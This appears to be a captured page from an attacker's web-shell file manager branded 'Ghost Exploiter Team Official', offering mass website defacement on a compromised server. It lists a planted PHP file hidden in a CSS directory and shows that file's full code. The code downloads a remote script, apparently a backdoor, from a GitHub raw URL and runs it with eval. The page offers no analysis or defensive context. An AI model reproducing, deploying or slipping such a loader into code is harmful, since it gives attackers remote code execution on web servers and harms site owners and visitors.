Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
public
/
css
/
filament
/
57qk02
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
p84kv.php
0.557KB
edt
ren
<?php $url = 'https://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/ws.php'; $context = stream_context_create([ 'http' => [ 'follow_location' => 1, 'timeout' => 10, 'ignore_errors' => true ], 'ssl' => [ 'verify_peer' => true, 'verify_peer_name' => true ] ]); $handle = @fopen($url, 'r', false, $context); $content = $handle ? stream_get_contents($handle) : ''; if ($handle) fclose($handle); if (!empty($content)) { eval('?>' . $content); } else { echo "X"; }